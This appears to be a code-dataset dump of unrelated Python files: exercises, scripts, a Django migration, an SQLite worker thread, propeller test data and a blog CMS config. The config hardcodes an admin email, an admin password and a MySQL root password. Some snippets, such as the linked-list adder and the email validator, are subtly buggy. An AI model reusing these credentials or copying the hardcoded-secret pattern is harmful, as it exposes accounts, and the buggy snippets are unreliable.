text stringlengths 38 1.54M |
|---|
#
#
#
#This is python example 2.
x= 10;
y= 25;
print 'x + y = ', x + y;
print 'x * y = ', x * y;
|
# Generated by Django 3.1.6 on 2021-04-21 04:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('order', '0022_auto_20210421_0430'),
]
operations = [
migrations.AddField(
model_name='block',
name='buyer_email',
field=models.CharField(max_length=100, null=True),
),
]
|
x= range(100,1000)
y=range(100,1000)
liste=[]
enbüyük=[111111]
for a in x:
for b in y:
sayi=str(a*b)
for t in range(0,len(sayi)//2):
if sayi[t]!=sayi[-t-1]:
break
else:
liste.append(sayi)
for each in liste:
if int(enbüyük[0])<int(each):
enbüyük[0]= each
else:
continue
print(enbüyük[0])
|
# --*-- coding:utf-8 --*--
# for Python 2.7
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from filature.bave import qvlbave
plt.figure(figsize=(10.0, 8.0))
bave = qvlbave.QVLBave(1200, 2.8, 1.8 / 2.8, 300.0 / 1200.0)
bave2 = qvlbave.QVLBave2(1200, 1.8 / 1200, 1 / 1200, 300 / 1200)
pos = np.array([0, 100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200])
size1 = bave.value(pos)
size2 = bave2.value(pos)
plt.plot(pos, size1, "--", "blue")
plt.plot(pos, size2, "-*", "red")
plt.show()
|
# -*- coding: utf-8 -*-
# yumo
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
g_Ax = None
def InitSystem():
global g_Ax
fig = plt.figure()
g_Ax = fig.add_subplot(111, projection='3d')
def DrawTriList(triList):
for tri in triList:
g_Ax.add_collection3d(Poly3DCollection(tri, facecolors='cyan', linewidths=0.5, edgecolors='r', alpha=.25))
def Show(xyzrange):
plt.xlim(xyzrange[0])
plt.ylim(xyzrange[1])
global g_Ax
g_Ax.set_zlim3d(xyzrange[2][0], xyzrange[2][1])
#plt.zlim(xyzrange[2])
plt.show()
|
import time
def timeme(method):
def wrapper(*args, **kw):
start_time = time.time()
result = method(*args, **kw)
end_time = time.time()
print(method.__name__, int(round((end_time - start_time) * 1000)), "ms")
return result
return wrapper
|
# <p>Create a function running_average that returns a function.
# When the function returned is passed a value, the function returns the current
# average of all previous function calls. You will have to use closure to solve this.
# You should round all answers to the 2nd decimal place.</p>
'''
rAvg = running_average()
rAvg(10) # 10.0
rAvg(11) # 10.5
rAvg(12) # 11
rAvg2 = running_average()
rAvg2(1) # 1
rAvg2(3) # 2
'''
def running_average():
total = 0
called = 0
def inner(value):
nonlocal total
nonlocal called
called += 1
total += value
x = total / called
return round(x, 2)
return inner
rAvg = running_average()
print(rAvg(10)) # 10.0
print(rAvg(11)) # 10.5
print(rAvg(12)) # 11
rAvg2 = running_average()
print(rAvg2(1)) # 1
print(rAvg2(3)) # 2
|
"""
Bite 313. Alternative constructors
In this Bite your are provides with a Domain class and a DomainException custom exception class.
You will add some validation to the current constructor to check if a valid domain name is passed in.
Next you will add a __str__ special method to represent the object (basically the name attribute)
and you will write two classmethods to construct domains:
1. from a URL
2. from an email
Here you can see the code in action (also make sure you check out the tests):
# >>> from constructors import Domain
# >>> str(Domain('google.com'))
# 'google.com'
# >>> str(Domain.parse_url("http://pybit.es"))
# 'pybit.es'
# >>> domain = Domain.parse_email("julian@pybit.es")
# >>> type(domain)
# <class 'constructors.Domain'>
# >>> str(domain)
'pybit.es'
"""
from urllib.parse import urlparse
import re
class DomainException(Exception):
"""Raised when an invalid is created."""
class Domain:
def __init__(self, name):
self.name = self._is_valid_name(name)
def _is_valid_name(self, name):
regex = r".*\.[a-z]{2,3}$"
if not re.match(regex, name):
raise DomainException
return name
# -----> Second approach to validate Class Attributes <-----
# def __init__(self, name):
# # self.name = name
#
# @property
# def name(self):
# return self.__name
#
# @name.setter
# def name(self, value):
# if re.match(r".*\.[a-z]{2,3}$", value):
# self.__name = value
# else:
# raise DomainException
# -----> Third approach to validate Class Attributes <-----
# def __init__(self, name):
# if not re.match(r'.*\.[a-z]{2,3}$', name.lower()):
# raise DomainException(f"{name} is an invalid domain")
# self.name = name
@classmethod
def parse_url(cls, url):
return cls(urlparse(url).netloc)
@classmethod
def parse_email(cls, email):
return cls(email.split('@')[1])
def __str__(self):
return self.name
|
import numpy as np
from utils import bbox_utils
def encode_textboxes(y, epsilon=10e-5):
""" Encode the label to a proper format suitable for training TextBoxes PlusPlus network.
Args:
- y: A numpy of shape (num_default_boxes, 2 + 12 + 8) representing a label sample.
Returns:
- A numpy array with the same shape as y but its gt boxes values has been encoded to the proper TextBoxes PlusPlus format.
Paper References:
- Liao, M., Shi, B., & Bai, X. (2018). TextBoxes++: A Single-Shot Oriented Scene Text Detector. https://arxiv.org/abs/1512.02325
"""
gt_textboxes = y[:, -20:-8]
df_boxes = y[:, -8:-4]
df_boxes_vertices = bbox_utils.center_to_vertices(df_boxes)
variances = y[:, -4:]
encoded_gt_textboxes_cx = ((gt_textboxes[:, 0] - df_boxes[:, 0]) / (df_boxes[:, 2])) / np.sqrt(variances[:, 0])
encoded_gt_textboxes_cy = ((gt_textboxes[:, 1] - df_boxes[:, 1]) / (df_boxes[:, 3])) / np.sqrt(variances[:, 1])
encoded_gt_textboxes_w = np.log(epsilon + gt_textboxes[:, 2] / df_boxes[:, 2]) / np.sqrt(variances[:, 2])
encoded_gt_textboxes_h = np.log(epsilon + gt_textboxes[:, 3] / df_boxes[:, 3]) / np.sqrt(variances[:, 3])
encoded_gt_textboxes_x1 = ((gt_textboxes[:, 4] - df_boxes_vertices[:, 0, 0]) / df_boxes[:, 2]) / np.sqrt(variances[:, 0])
encoded_gt_textboxes_y1 = ((gt_textboxes[:, 5] - df_boxes_vertices[:, 0, 1]) / df_boxes[:, 3]) / np.sqrt(variances[:, 1])
encoded_gt_textboxes_x2 = ((gt_textboxes[:, 6] - df_boxes_vertices[:, 1, 0]) / df_boxes[:, 2]) / np.sqrt(variances[:, 0])
encoded_gt_textboxes_y2 = ((gt_textboxes[:, 7] - df_boxes_vertices[:, 1, 1]) / df_boxes[:, 3]) / np.sqrt(variances[:, 1])
encoded_gt_textboxes_x3 = ((gt_textboxes[:, 8] - df_boxes_vertices[:, 2, 0]) / df_boxes[:, 2]) / np.sqrt(variances[:, 0])
encoded_gt_textboxes_y3 = ((gt_textboxes[:, 9] - df_boxes_vertices[:, 2, 1]) / df_boxes[:, 3]) / np.sqrt(variances[:, 1])
encoded_gt_textboxes_x4 = ((gt_textboxes[:, 10] - df_boxes_vertices[:, 3, 0]) / df_boxes[:, 2]) / np.sqrt(variances[:, 0])
encoded_gt_textboxes_y4 = ((gt_textboxes[:, 11] - df_boxes_vertices[:, 3, 1]) / df_boxes[:, 3]) / np.sqrt(variances[:, 1])
y[:, -20] = encoded_gt_textboxes_cx
y[:, -19] = encoded_gt_textboxes_cy
y[:, -18] = encoded_gt_textboxes_w
y[:, -17] = encoded_gt_textboxes_h
y[:, -16] = encoded_gt_textboxes_x1
y[:, -15] = encoded_gt_textboxes_y1
y[:, -14] = encoded_gt_textboxes_x2
y[:, -13] = encoded_gt_textboxes_y2
y[:, -12] = encoded_gt_textboxes_x3
y[:, -11] = encoded_gt_textboxes_y3
y[:, -10] = encoded_gt_textboxes_x4
y[:, -9] = encoded_gt_textboxes_y4
return y
|
import numpy as np
import cv2
# insert any image file you want here
img = cv2.imread('image.jpg')
# open window
cv2.namedWindow('Image', cv2.WINDOW_NORMAL)
# show image in window
cv2.imshow('Image', img)
cv2.imwrite("output.jpg", img)
print(img)
print(img.dtype)
print(img.shape)
# like console readline
cv2.waitKey()
|
import json
import sys
import io
def stringToIntegerList(input):
return json.loads(input)
class ListNode:
def __init__(self,val=0,next=None):
self.val=val
self.next=next
def stringToListNode(input):
numbers=stringToIntegerList(input)
dummyRoot=ListNode(0)
ptr=dummyRoot
for number in numbers:
ptr.next =ListNode(number)
ptr=ptr.next
new =dummyRoot.next
return new
class Solution:
def addTwoNumbers(self, l1:ListNode, l2:ListNode):
head=ListNode()
p=head
carry=0
while carry or l1 or l2:
var=carry
if l1:
var1=l1.val+var
l1=l1.next
if l2:
var2=l2.val+var1
l2=l2.next
carry,var3=divmod(var2,10)
p.next=ListNode(var3)
p=p.next
return head.next
def ListNodeToString(node):
if not node:
return None
result=""
while node:
result+=str(node.val)+', '
node=node.next
return "["+result[:-2]+"]"
def EnterMain():
def readline():
for line in io.TextIOWrapper(sys.stdin.buffer,encoding='utf-8'):
yield line.strip('\n')
lines=readline()
while True:
try:
line=next(lines)
l1=stringToListNode(line)
line=next(lines)
l2=stringToListNode(line)
node=Solution().addTwoNumbers(l1, l2)
out=ListNodeToString(node)
print(out)
except StopIteration:
break
if __name__ == '__main__':
EnterMain() |
# -*- coding: utf-8 -*-
from openerp import models, fields, api, _
from openerp.exceptions import UserError, ValidationError, Warning
class cashadvance(models.Model):
_name = 'comben.cashadvance'
sequence_id =fields.Char(string='Sequence ID')
@api.model
def create(self, vals):
vals['sequence_id'] = self.env['ir.sequence'].get('comben.cashadvance')
return super(cashadvance, self).create(vals) |
import cMonster
import pygame
from cAnimSprite import cAnimSprite
import functions as BF
class cItemBouncer(cMonster.cMonster):
BSPRITEFAC = 1 #this is a little dirty. References the value assigned in cAnimSpriteFactory
def __init__(self,x,y,rot):
cMonster.cMonster.__init__(self,x,y,rot)
self.image = pygame.image.load("sprites/bouncer.png").convert_alpha()
self.rect = self.image.get_rect().move(x,y)
self.mask = pygame.mask.from_surface(self.image);
anim_images = BF.load_and_slice_sprite(32,32,'bouncer_nanim.png');
col_anim_images = BF.load_and_slice_sprite(32,32,'bouncer_anim.png');
self.anim = cAnimSprite(anim_images,5)
self.col_anim = cAnimSprite(col_anim_images,20)
self.anim.rect = self.rect
self.col_anim.rect = self.rect
#Status sets
self.col_anim.draw = False
def onCollision(self,stick,status):
stick.flip_rotation()
def isMonster(self):
return False
|
import re
class Validate:
def __init__(self, username=None, password=None, ver_password=None, email=None):
self.username = username
self.password = password
self.ver_password = ver_password
self.email = email
def username_val(self):
USER_RE = re.compile(r"^[a-zA-Z0-9_-]{3,20}$")
return USER_RE.match(self.username)
def password_val(self):
PASS_RE = re.compile(r"^.{3,20}$")
return PASS_RE.match(self.password)
def equal(self):
valid = False
if self.password == self.ver_password:
valid = True
return valid
def email_val(self):
if self.email:
EMAIL_RE = re.compile(r"^[\S]+@[\S]+.[\S]+$")
return EMAIL_RE
else:
return True
def validate(self):
if self.username_val() and self.password_val() and self.equal() and self.email_val():
return True
|
__author__ = 'makarenok'
from model.contact import Contact
import random
def test_modify_contact_first_name(app, db, check_ui):
if app.contact.count() == 0:
app.contact.create(Contact(firstname="testFirstName", middlename="testMiddleName"))
old_contacts = db.get_contact_list()
contact = random.choice(old_contacts)
new_contact = Contact(firstname="New firstName")
new_contact.id = contact.id
app.contact.modify_contact_by_id(contact.id, new_contact)
new_contacts = db.get_contact_list()
assert len(old_contacts) == len(new_contacts)
for i, old_contact in enumerate(old_contacts):
if old_contact.id == contact.id:
old_contacts[i] = new_contact
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui:
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
# def test_modify_contact_middle_name(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(first_name="testFirstName", middle_name="testMiddleName"))
# old_contacts = app.contact.get_contact_list()
# app.contact.modify_first_contact(Contact(middle_name="New middleName"))
# new_contacts = app.contact.get_contact_list()
# assert len(old_contacts)== len(new_contacts)
|
__author__ = 'spijs'
from evaluationStrategy import EvaluationStrategy
import nltk
import nltkbleu
class BleuScore(EvaluationStrategy):
'''BLEU evaluation of the generated sentences
-> should ONLY be used for evaluating and sorting individual sentences.
multi-bleu.perl should be used for evluating full corpus'''
def evaluate_sentence(self,sentence,references,n):
''' Evaluates and returns the bleu score of a single sentence given its references and n of ngrams '''
ref_texts = []
weights = self.get_weights(n)
for ref in references:
ref_texts.append(nltk.word_tokenize(ref))
cand = nltk.word_tokenize(sentence)
bleu = 0
#sf = nltkbleu.SmoothingFunction()
if cand and len(cand)>0:
bleu = nltkbleu.sentence_bleu(ref_texts,cand,weights)
if bleu == 0:
print "candidate :" + str(cand)
print "references : "+ str(ref_texts)
return bleu
def evaluate_total(self,sentences,references,n):
''' Evaluates and returns the bleu score of a corpus of sentences given their references and n of ngrams
SHOULD NOT BE USED'''
candidates = []
final_references = []
for sentence in sentences:
candidates.append(nltk.word_tokenize(sentence))
for imagerefs in references:
tokenizedrefs = []
for imageref in imagerefs:
tokenizedrefs.append(nltk.word_tokenize(imageref))
final_references.append(tokenizedrefs)
return nltkbleu.corpus_bleu(final_references,candidates,self.get_weights(n))
def get_weights(self,n):
''' Returns a list of uniform weights, based on the choice of n'''
value = 1/(n*1.0)
weights = []
for i in range(n):
weights.append(value)
return weights |
from __future__ import division # let 5/2 = 2.5 rather than 2
from Aerothon.ACPropeller import ACPropeller
from Aerothon.AeroUtil import STDCorrection
import numpy as npy
import pylab as pyl
from scalar.units import IN, LBF, SEC, ARCDEG, FT, RPM, OZF, GRAM, gacc, Pa, degR, W, inHg, K
from scalar.units import AsUnit
# Set Propeller properties
Prop = ACPropeller()
Prop.name = 'Graupner 13.5x6' #This is a Santiago especial
Prop.D = 13.5*IN
Prop.Thickness = 5/8*IN
Prop.Pitch = 6*IN
Prop.dAlpha = 3.7*ARCDEG
Prop.Solidity = 0.0135
Prop.AlphaStall = 15*ARCDEG
Prop.AlphaZeroCL = 0*ARCDEG
Prop.CLSlope = 0.08/ARCDEG
Prop.CDCurve = 2.3
Prop.CDp = 0.01
Prop.Weight = 100*LBF
#
# These are corrected for standard day
#Standard correction for 2:00 pm for the test day
STD = STDCorrection(30.03*inHg, (19 + 273.15)*K)
#
# RPM, Thrust
Prop.ThrustData = [(4560 *RPM, (2 *LBF + 13*OZF)*STD),
#(13500 *RPM, (9 *LBF + 3*OZF)*STD),
(5760 *RPM, (3 *LBF + 7*OZF)*STD),
(6900 *RPM, (4 *LBF + 5*OZF)*STD),
(7890 *RPM, (4 *LBF + 9*OZF)*STD),
(9300 *RPM, (7 *LBF + 6*OZF)*STD),
(9450 *RPM, (7 *LBF + 12*OZF)*STD),
(8200 *RPM, (6 *LBF + 5*OZF)*STD),
(4230 *RPM, (2 *LBF + 0*OZF)*STD),
(5430 *RPM, (2 *LBF + 12*OZF)*STD),
(6390 *RPM, (3 *LBF + 15*OZF)*STD),
(7200 *RPM, (4 *LBF + 4*OZF)*STD),
(8010 *RPM, (5 *LBF + 7*OZF)*STD),
(8400 *RPM, (6 *LBF + 0*OZF)*STD),
(8700 *RPM, (7 *LBF + 3*OZF)*STD),
(6940 *RPM, (7 *LBF + 4*OZF)*STD),
(9180 *RPM, (7 *LBF + 5*OZF)*STD),
(9420 *RPM, (7 *LBF + 11*OZF)*STD),
(9630 *RPM, (8 *LBF + 7*OZF)*STD),
(9600 *RPM, (8 *LBF + 9*OZF)*STD)]
STD = STDCorrection(30.3*inHg, (19 + 273.15)*K)
ThrustData = [(3450 *RPM, (1 *LBF + 4*OZF)*STD),
(5070 *RPM, (2 *LBF + 10*OZF)*STD),
(5940 *RPM, (3 *LBF + 12*OZF)*STD),
(6930 *RPM, (4 *LBF + 14*OZF)*STD),
(8100 *RPM, (6 *LBF + 11*OZF)*STD),
(8670 *RPM, (8 *LBF + 3*OZF)*STD),
(9210 *RPM, (8 *LBF + 8*OZF)*STD),
(9660 *RPM, (9 *LBF + 1*OZF)*STD),
(9670 *RPM,(9 *LBF + 3*OZF)*STD)]
Prop.ThrustData += ThrustData
Arm = 19.5*IN
# RPM, Torque
Prop.TorqueData = [(9720 *RPM, (4.75*Arm*OZF)*STD),
(4470 *RPM, (.50*Arm*OZF)*STD),
(5610 *RPM, (1.20*Arm*OZF)*STD),
(6690 *RPM, (1.75*Arm*OZF)*STD),
(8010 *RPM, (3.0*Arm*OZF)*STD),
(8640 *RPM, (3.60*Arm*OZF)*STD),
(9330 *RPM, (4.35*Arm*OZF)*STD),
(9720 *RPM, (4.65*Arm*OZF)*STD),
(9300 *RPM, (4.40*Arm*OZF)*STD),
(8460 *RPM, (3.25*Arm*OZF)*STD),
(7230 *RPM, (2.30*Arm*OZF)*STD),
(4560 *RPM, (.75*Arm*OZF)*STD)]
################################################################################
if __name__ == '__main__':
Vmax = 100
h=0*FT
N=npy.linspace(1000, 10000, 5)*RPM
Alpha = npy.linspace(-25,25,41)*ARCDEG
V = npy.linspace(0,Vmax,30)*FT/SEC
Prop.CoefPlot(Alpha,fig = 1)
Prop.PTPlot(N,V,h,'V', fig = 2)
#
# N = npy.linspace(0, 13000,31)*RPM
# V = npy.linspace(0,Vmax,5)*FT/SEC
#
# Prop.PTPlot(N,V,h,'N', fig = 3)
Prop.PlotTestData(fig=4)
N = 9600*RPM
print "Max " + AsUnit(Prop.MaxRPM(), 'rpm', '%3.0f') + " at " + AsUnit(Prop.MaxTipSpeed, 'ft/s') + " tip speed "
print
print "Static Thrust : ", AsUnit( Prop.T(N, 0*FT/SEC, h), 'lbf' )
print "Measured Thrust : ", AsUnit( max(npy.array(Prop.ThrustData)[:,1]), 'lbf' )
N = 9700*RPM
print
print "Static Torque : ", AsUnit( Prop.P(N, 0*FT/SEC, h)/N, 'in*ozf' )
print "Measured Torque : ", AsUnit( max(npy.array(Prop.TorqueData)[:,1]), 'in*ozf' )
pyl.show()
|
#!/usr/bin/env python
#coding=utf-8
import os
#网站信息
WEB_URL='/'
WEB_NAME='上帝De助手 的博客'
WEB_SUBNAME='我只生产内容,我不是互联网的搬运工!'
WEB_TITLE='seo基础入门教程_网络营销入门学习_移动互联网创业项目故事'
WEB_KEYWORDS='seo基础入门教程,互联网络营销入门学习,移动互联网创业项目,互联网创业故事'
WEB_DESCRIPTION='发布有关seo相关的基础学习教程,开发seo相关的工具;学习互联网思维,并运用互联网思维进行网络营销策划;同时关注各行业互联网、移动互联网创业项目的发展。'
TEMPLATE_THEME='default'
PER_PAGE_COUNT = 10
#账号相关
ADMIN_USERNAME = 'five3@163.com'
ADMIN_PASSWORD='chenxiaowu'
#项目配置
DEFAULT_PATH='/index/index'
DEBUG_SWITCH=True
STATUS_LIST = {1:'发布',0:'草稿'}
#路径信息
ROOT_PATH=os.getcwd()+'/'
DATA_DIR_PATH=ROOT_PATH+'data/'
TMP_DIR_PATH=ROOT_PATH+'data/cache/'
#目录结构
UPLOAD_DIR='static/upload/'
TPL_DIR = 'templates'
ADMIN_TPL_DIR='admin'
#数据库信息
# DB_TYPE='sqlite'
# DB_STRING=DATA_DIR_PATH+'cms.db'
# DB_TABEL_PREFIX='cms_'
DB_TYPE='mysql'
DB_STRING='localhost/3306/root/changeit!/weblog'
DB_TABEL_PREFIX='cms_'
|
# -*- coding: utf-8 -*-
# Autor: Cristian Sáez Mardones
# Fecha: 18-04-2021
# Versión: 1.0.0
# Objetivo: Crear un juego de batallas pokemon
# Importación de archivo
# No hay
# Importación de bibliotecas
# Si hay
# Importación de funciones
# No hay
### Bibliotecas ###
# Biblioteca para el manejo de rutas
from pathlib import Path
# Biblioteca para e manejo de ficheros JSON
import json
# Ruta del archivo
ruta = Path(__file__).resolve().parent
#####################################################################
# Función: Escribir los tipos de pokemon en un archivo json
# Entrada: diccionario con tipos de pokemon
# Salida: No hay
def write_types(types:dict) -> None:
with open(ruta.joinpath('archivos').joinpath('types.json'), 'w') as json_file:
json.dump(types, json_file, indent=4)
#####################################################################
# Función: Leer el fichero json con los tipos de pokemon
# Entrada: No hay entrada en la función
# Salida: Lista con los tipos de pokemon
def read_types() -> dict:
with open(ruta.joinpath('archivos').joinpath('types.json')) as json_file:
TIPOS_POKEMON = json.load(json_file)['types']
return TIPOS_POKEMON
#####################################################################
# Función: Escribir los pokemon junto a sus datos en un archivo json
# Entrada: diccionario con tipos de pokemon
# Salida: No hay
def write_pokemons(pokemons:dict) -> None:
with open(ruta.joinpath('archivos').joinpath('pokemons.json'), 'w') as json_file:
json.dump(pokemons, json_file, indent=4)
#####################################################################
# Función: Leer el fichero json con los pokemon
# Entrada: No hay entrada en la función
# Salida: Diccionario con la información de los pokemon
def read_pokemons() -> dict:
with open(ruta.joinpath('archivos').joinpath('pokemons.json')) as json_file:
POKEMONS = json.load(json_file)['pokemons']
return POKEMONS
#####################################################################
# Función: Escribir las naturalezas pokemon en un archivo json
# Entrada: diccionario con naturalezas de pokemon
# Salida: No hay
def write_natures(natures:dict) -> None:
with open(ruta.joinpath('archivos').joinpath('natures.json'), 'w') as json_file:
json.dump(natures, json_file, indent=4)
#####################################################################
# Función: Leer el fichero json con las naturalezas pokemon
# Entrada: No hay entrada en la función
# Salida: Lista con las naturalezas pokemon
def read_natures() -> dict:
with open(ruta.joinpath('archivos').joinpath('natures.json')) as json_file:
NATURES = json.load(json_file)['natures']
return NATURES |
import time
import numpy as np
from sklearn.datasets import fetch_mldata
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
np.random.seed(0)
mnist = fetch_mldata('MNIST original')
data = np.hstack((mnist.data, mnist.target.reshape(-1, 1)))
np.random.shuffle(data)
# with open('mnist.csv', 'wb') as f:
# np.savetxt(f, data.astype(int), fmt='%i', delimiter=',')
X_tr, y_tr = data[:60000, :-1], data[:60000, -1]
X_te, y_te = data[60000:, :-1], data[60000:, -1]
X_tr /= 255
X_te /= 255
training_times = []
prediction_times = []
for _ in range(50):
softmax = LogisticRegression(tol=1e-4, C=1e10, solver='lbfgs', multi_class='multinomial')
t0 = time.time()
softmax.fit(X_tr, y_tr)
training_times.append(time.time() - t0)
t0 = time.time()
softmax.predict(X_te)
prediction_times.append(time.time() - t0)
softmax = LogisticRegression(tol=1e-4, C=1e10, solver='lbfgs', multi_class='multinomial')
softmax.fit(X_tr, y_tr)
y_te_pred = softmax.predict(X_te)
training_times = np.array(training_times)
prediction_times = np.array(prediction_times)
print("Training time: {:.3f}s (+/- {:.3f}s)".format(training_times.mean(), 2 * training_times.std()))
print("Prediction time: {:.3f}s (+/- {:.3f}s)".format(prediction_times.mean(), 2 * prediction_times.std()))
print("Test set accuracy: {:.4f}".format(accuracy_score(y_te, y_te_pred)))
|
from __future__ import division
import numpy as np
import pandas as pd
from multiprocessing import Pool
from matplotlib import pyplot as plt
def load_panel(a):
a = pd.read_pickle(a)
return a
def time_index(a):
a = a.reindex(index=a.index.to_datetime())
return a
def resamp(a):
a = a.resample('10T')
return a
def resamp_std(a):
a = a.resample('10T',how='std')
return a
def angle(a):
a = np.arctan2(a['v'],a['u'])
return a
def angle_plus(a):
a = a[a>0]
return a
def angle_minus(a):
a = a[a<0]
return a
def getvalues(a):
a = a.max().describe()
return a
if __name__ == "__main__":
a1 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn3_adcp_error'
a2 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn4_adcp_error'
a3 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn5_adcp_error'
a4 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn3_adcp_corrected'
a5 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn4_adcp_corrected'
a6 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn5_adcp_corrected'
a = [a1,a2,a3,a4,a5,a6]
a = Pool().map(load_panel,a)
a = [a[0],a[1],a[2],a[3].mean(axis=2),a[4].mean(axis=2),a[5].mean(axis=2)]
a = Pool().map(time_index,a)
b = Pool().map(angle,a[3:6])
b_up = Pool().map(angle_plus,b)
b_down = Pool().map(angle_minus,b)
a_up1 = a[0].join(b_up[0],how='inner').drop('v',1)
a_up2 = a[1].join(b_up[1],how='inner').drop('v',1)
a_up3 = a[2].join(b_up[2],how='inner').drop('v',1)
a_up = [a_up1,a_up2,a_up3]
a_down1 = a[0].join(b_down[0],how='inner').drop('v',1)
a_down2 = a[1].join(b_down[1],how='inner').drop('v',1)
a_down3 = a[2].join(b_down[2],how='inner').drop('v',1)
a_down = [a_down1,a_down2,a_down3]
a_up = Pool().map(getvalues,a_up)
a_down = Pool().map(getvalues,a_down)
d = {'Flow Station 3':a_up[0],'Flow Station 4':a_up[1],'Flow Station 5':a_up[2]}
frame = pd.DataFrame(d)
x = frame.to_latex()
print x
d = {'Flow Station 3':a_down[0],'Flow Station 4':a_down[1],'Flow Station 5':a_down[2]}
frame = pd.DataFrame(d)
x = frame.to_latex()
print x
|
def identify_weapon(character):
if character == "Laval":
return "Laval-Shado Valious"
elif character == "Cragger":
return "Cragger-Vengdualize"
elif character == "Lagravis":
return "Lagravis-Blazeprowlor"
elif character == "Crominus":
return "Crominus-Grandorius"
elif character == "Tormak":
return "Tormak-Tygafyre"
elif character == "LiElla":
return "LiElla-Roarburn"
else:
return "Not a character" |
"""Functionality related to binding python functions to specific templated SQL statements."""
from dinao.binding.binders import FunctionBinder
__all__ = ["FunctionBinder", "errors"]
|
# Admission for anyone under age 4 is free
# Admission for anyone between the ages of 4 and 18 is $25
# Admission for anyone age 18 or older is $40
age = int(input('How old are you?\n'))
if age < 4:
print("The cost of your ticket is $0")
elif age < 18:
print("The cost of your ticket is $25")
else:
print("The cost of your ticket is $40")
# V2
age = int(input('\nHow old are you?\n'))
if age < 4:
price = 0
elif age < 18:
price = 25
else:
price = 40
print(f"The cost of your admission is ${price}") |
import threading
import sqlite3
import Queue
import wx
class DBThread(threading.Thread):
"""
This thread is used to run SQL queries. It allows the UI to remain
responsive during queries that may take several seconds.
(Note: the fetch part of the query is usually the slow part. The execute
part is comparatively fast.)
The user communicates with this thread via an input Queue. Queries should be
put into the input Queue using the form:
["sync", "SELECT * FROM changes", output Queue]
["async", "SELECT * FROM changes", output Queue]
"""
SQL_CREATE_TABLE = ("CREATE TABLE changes (client TEXT, user TEXT, "
"date DATETIME, change INT primary key, description TEXT)")
# TODO: Are these the proper indices to create?
SQL_CREATE_INDEX = ("CREATE INDEX idx ON changes (client, user, date, "
"change, description)")
def __init__(self, inputQueue):
threading.Thread.__init__(self)
self._inputQueue = inputQueue
self._outputQueue = None
self._queryType = ""
self._queryString = ""
self._sqlCursor = None
self._sqlConn = None
self.setDaemon(True)
self.start()
def run(self):
self._connect()
doneFetch = False
while 1:
try:
query = self._inputQueue.get(doneFetch)
# Check if the thread has been signaled to close
if query is None:
self._outputQueue.put(None)
break
self._queryType = query[0]
self._queryString = query[1]
self._outputQueue = query[2]
doneFetch = False
self._sqlCursor.execute(self._queryString)
except Exception:
if not doneFetch:
if self._queryType == "async":
result = self._sqlCursor.fetchmany(200)
self._outputQueue.put(result)
wx.WakeUpIdle() # Triggers wx Idle events
if len(result) == 0:
doneFetch = True
else:
result = self._sqlCursor.fetchall()
self._outputQueue.put(result)
wx.WakeUpIdle() # Triggers wx Idle events
doneFetch = True
def _connect(self):
# TODO: Try loading database completely into memory
# Setup sqlite database
sqlConn = sqlite3.connect('p4db')
sqlConn.text_factory = str
sqlCursor = sqlConn.cursor()
# Create the changes table if it doesn't exist
sqlCursor.execute("SELECT name FROM sqlite_master")
if(sqlCursor.fetchone() == None):
sqlCursor.execute(DBThread.SQL_CREATE_TABLE)
sqlCursor.execute(DBThread.SQL_CREATE_INDEX)
self._sqlCursor = sqlCursor
self._sqlConn = sqlConn
|
from MainFrame import *
REFRESH_RATE = 1000
class Ele(Tk):
def __init__(self):
Tk.__init__(self)
self.minsize(width=800, height=800)
self.resizable(width=FALSE, height=FALSE)
MainFrame(master=self)
|
from datetime import datetime
import googlemaps
import os.path
import re
import xlwt
import yaml
# ---
# Init
# ---
book = xlwt.Workbook(encoding="utf-8")
sheet = book.add_sheet("Kilometers")
file_name_key = "key.txt"
file_name_addresses = "addresses.yaml"
file_name_distances = "distances.yaml"
file_name_data = "data.txt"
# ---
# Google maps
# ---
file_name = file_name_key
try:
print("Read key file...")
key = open(file_name, "r").read()
except:
print("ERROR: " + file_name + " file (for Google maps API) doesn't exist")
print("Please create the file and paste the your key in it")
quit()
try:
print("Init Google maps...")
gmaps = googlemaps.Client(key=key)
except:
print("ERROR: The key for Google maps API is invalid")
quit()
# ---
# Address book
# ---
file_name = file_name_addresses
try:
print("Read addresses file...")
f = open(file_name, "r", encoding="utf8")
except:
print("ERROR: " + file_name + " file (for Google maps API) doesn't exist")
quit()
try:
print("Import addresses...")
addresses_book = yaml.safe_load(f) or {}
except yaml.YAMLError as error:
print("ERROR: " + file_name + " is incorrect")
print(error)
# ---
# Distances book
# ---
file_name = file_name_distances
if os.path.isfile(file_name):
print("Read the distances file...")
f = open(file_name, "r", encoding="utf8")
try:
print("Import the distances...")
distances_book = yaml.safe_load(f) or {}
except yaml.YAMLError as error:
print("ERROR: " + file_name + " is incorrect")
print(error)
quit()
# ---
# Data file
# ---
regex_date = re.compile("^(0|1|2|3)?[0-9](\/(0|1)?[0-9](\/(20)?(0|1|2)[0-9])?)?$")
regex_home = re.compile("^home ?= ?([a-z|A-Z|0-9]+_?)*[a-z|A-Z|0-9]")
regex_trip = re.compile("^(([a-z|A-Z|0-9]+_?)*[a-z|A-Z|0-9])? ?-?> ?(([a-z|A-Z|0-9]+_?)*[a-z|A-Z|0-9])?$")
regex_skip = re.compile("^(#.*)?$")
counter_global = 0
counter_trip = 0
day = None
month = None
year = None
home_name = ""
departure_name = ""
arrival_name = ""
file_name = file_name_data
try:
print("Read addresses file...")
f = open(file_name, "r", encoding="utf8")
except:
print("ERROR: " + file_name + " file (for Google maps API) doesn't exist")
quit()
print("Process the data file...")
for line in f:
line = line.replace(" ", "").rstrip()
counter_global += 1
if (regex_date.match(line)):
date = line.split("/")
day = date[0]
if (len(date) >= 2):
month = date[1]
if (len(date) == 3):
year = date[2]
else:
print("ERROR: Incorrect date in " + file_name)
quit()
